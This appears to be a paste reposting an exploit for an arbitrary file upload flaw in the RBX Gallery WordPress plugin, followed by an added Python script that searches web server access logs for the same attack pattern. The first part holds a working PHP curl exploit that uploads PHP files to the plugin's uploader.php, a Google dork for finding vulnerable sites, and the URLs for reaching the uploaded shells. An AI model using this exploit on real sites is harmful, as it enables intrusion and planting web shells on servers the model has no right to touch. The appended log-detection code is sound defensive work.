TRiG3Rx

xploit wp

Jun 21st, 2018
##################################################
# Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File Upload Vulnerability
# Version : 2.1
# Link : http://wordpress.org/extend/plugins/rbxgallery/
# Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip
# Date : 03-06-2012
# Google Dork : inurl:/wp-content/plugins/rbxgallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$uploadfile2="db.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('images[0]'=>"@$uploadfile",
'images[1]'=>"@$uploadfile2",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php

lo.php
<?php
phpinfo();
?>
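
For defenders, the request pattern in the advisory above (a POST to the plugin's uploader.php, then a request for a script under uploads/rbxslider/) can be searched for in web server access logs. The following is an added example, not part of the original paste or the advisory author's code; it assumes a common/combined access log layout, and the function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Paths taken from the advisory above.
UPLOADER = "/wp-content/plugins/rbxgallery/uploader.php"
UPLOAD_DIR = "/wp-content/uploads/rbxslider/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
# Assumed log layout: ip ident user [time] "METHOD path proto" status ...
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})\b')

def classify(line):
    """Return (ip, kind, path, status) for a relevant request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0].lower()
    status = int(m["status"])
    if m["method"] == "POST" and path.endswith(UPLOADER):
        return m["ip"], "upload", path, status
    # A script requested from the upload directory is suspect on its own.
    if UPLOAD_DIR in path and SCRIPT_EXT.search(path):
        return m["ip"], "script", path, status
    return None

def find_incidents(lines):
    """Group hits by client IP. 'confirmed' means an upload POST was later
    followed by a 200 response for a script in the upload directory."""
    seen = defaultdict(lambda: {"uploads": 0, "scripts": [], "confirmed": False})
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        ip, kind, path, status = hit
        rec = seen[ip]
        if kind == "upload":
            rec["uploads"] += 1
        else:
            rec["scripts"].append((path, status))
            rec["confirmed"] = rec["confirmed"] or (rec["uploads"] > 0 and status == 200)
    return dict(seen)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Jun/2018:10:00:01 +0000] "POST /wordpress/wp-content/plugins/rbxgallery/uploader.php HTTP/1.1" 200 312',
    '198.51.100.7 - - [21/Jun/2018:10:00:05 +0000] "GET /wordpress/wp-content/uploads/rbxslider/lo.php HTTP/1.1" 200 80211',
    '203.0.113.9 - - [21/Jun/2018:10:02:00 +0000] "GET /wordpress/wp-content/uploads/rbxslider/photo.jpg HTTP/1.1" 200 5120',
    '203.0.113.20 - - [21/Jun/2018:10:03:00 +0000] "GET /wp-content/uploads/rbxslider/db.php HTTP/1.1" 404 199',
]
```

A "script" hit with no preceding upload still merits review, since the upload may predate the log window being searched.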